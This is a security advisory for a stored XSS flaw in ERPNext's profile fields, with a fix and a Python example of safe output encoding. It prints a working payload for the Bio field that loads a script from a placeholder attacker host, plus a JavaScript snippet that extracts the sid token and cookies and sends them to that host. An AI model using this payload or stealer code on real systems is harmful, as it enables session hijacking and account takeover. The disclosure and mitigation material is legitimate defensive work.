Date: June 22, 2022


ERPNext is affected by a stored XSS vulnerability that allows low-privileged application users to store malicious scripts in the ‘Location’, ‘Interests’ and ‘Bio’ fields of the “Edit Profile” section. These scripts execute in a victim’s browser when the victim opens a page that renders the vulnerable field. Because the victim who inadvertently triggers the attack can be a highly privileged user, such as an administrator, the injected script can extract the sid token and cookies, which can lead to full account takeover and privilege escalation. There is also an availability impact: once the JavaScript payload is stored on the server, the victim can no longer browse the platform.


In ERPNext, versions v12.0.9 through v13.0.3 are vulnerable to stored Cross-Site Scripting (XSS) because user input is not validated properly. A low-privileged attacker could inject arbitrary code into input fields when editing their profile.

PoC Details

Log in as a low-privileged application user, go to the ‘My Profile’ section under “Settings”, then click the ‘Edit Profile’ button. Edit the ‘Bio’ input field and insert the XSS payload shown in the PoC Code section. Next, create a file ‘test1.js’ with the contents given below and set up a simple HTTP listener. Once any user logs in, the payload executes and that user’s session cookie is exposed to the listener. Using the captured data, the attacker can log in as that user.

test1.js code:
// Pattern for the "sid" entry inside the boot data embedded in the page HTML.
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
// Pattern for the bare alphanumeric token value.
var te = /[0-9a-zA-Z]+/gm;

// Locate the sid token in the rendered page and isolate its value.
var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(':');
getSID = getSID[1].match(te);
// Build a request to the listener carrying the sid token and document.cookie.
var url = 'http://<attacker-ip>:<port>/?sid='+getSID;
var script = document.createElement('script');
script.src = url+"&details= " + document.cookie;

PoC Code

JavaScript XSS payload (the value entered in the ‘Bio’ field):
<!--</SCRIPT><script src=http://<attacker-ip>:<port>/test1.js></script>-->

Affected Environments

ERPNext versions v12.0.9 through v13.0.3


Upgrade to ERPNext version 13.1.0
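The root cause above is user-controlled profile text reaching the page without context-appropriate encoding; the published payload closes a script element with ‘</SCRIPT>’ and then opens a new one. The following is an added example, not ERPNext’s own code: it renders the advisory’s payload in the two contexts that matter (HTML body and JSON embedded in an inline script), contrasting insufficient and sufficient encoding. Field names and the non-payload values are assumed/constructed.

```python
import html
import json
import re

# The stored payload quoted in the advisory above (value written to the 'Bio' field).
POC_PAYLOAD = "<!--</SCRIPT><script src=http://<attacker-ip>:<port>/test1.js></script>-->"

# Assumed profile field names; the non-payload values are constructed samples.
PROFILE = {"location": "Berlin", "interests": "Kubernetes & Rust", "bio": POC_PAYLOAD}

# Characters that can end a <script> element or break a JS string literal.
_SCRIPT_UNSAFE = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026",
                  "\u2028": "\\u2028", "\u2029": "\\u2029"}


def render_html_field(value: str) -> str:
    """HTML-body context: entity-encode so the value is shown as text, never parsed as markup."""
    return html.escape(value, quote=True)


def naive_script_json(obj) -> str:
    """Insufficient: json.dumps leaves '</SCRIPT>' intact, so the browser's HTML parser
    closes the script element at that point and parses what follows as markup."""
    return json.dumps(obj)


def render_script_json(obj) -> str:
    """Inline <script> JSON context: \\uXXXX-escape the characters the HTML parser acts on."""
    text = json.dumps(obj, ensure_ascii=False)
    return "".join(_SCRIPT_UNSAFE.get(ch, ch) for ch in text)


def field_is_neutralized(rendered: str) -> bool:
    """True when a single rendered field contains no raw '<' that could open or close a tag."""
    return "<" not in rendered and re.search(r"</?script", rendered, re.I) is None


def build_profile_page(profile: dict) -> str:
    """Constructed page: the fields as HTML plus the same data embedded boot-style in a script."""
    rows = "".join(f"<p>{k}: {render_html_field(v)}</p>" for k, v in profile.items())
    boot = f"<script>var boot = {render_script_json(profile)};</script>"
    return f"<html><body>{rows}{boot}</body></html>"


if __name__ == "__main__":
    print("naive output still contains </SCRIPT>:", "</SCRIPT>" in naive_script_json(PROFILE))
    print(build_profile_page(PROFILE))
```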

Language: Python

Good to know:


Cross-Site Scripting (XSS)


CVSS v3 Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

CVSS v2 Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information: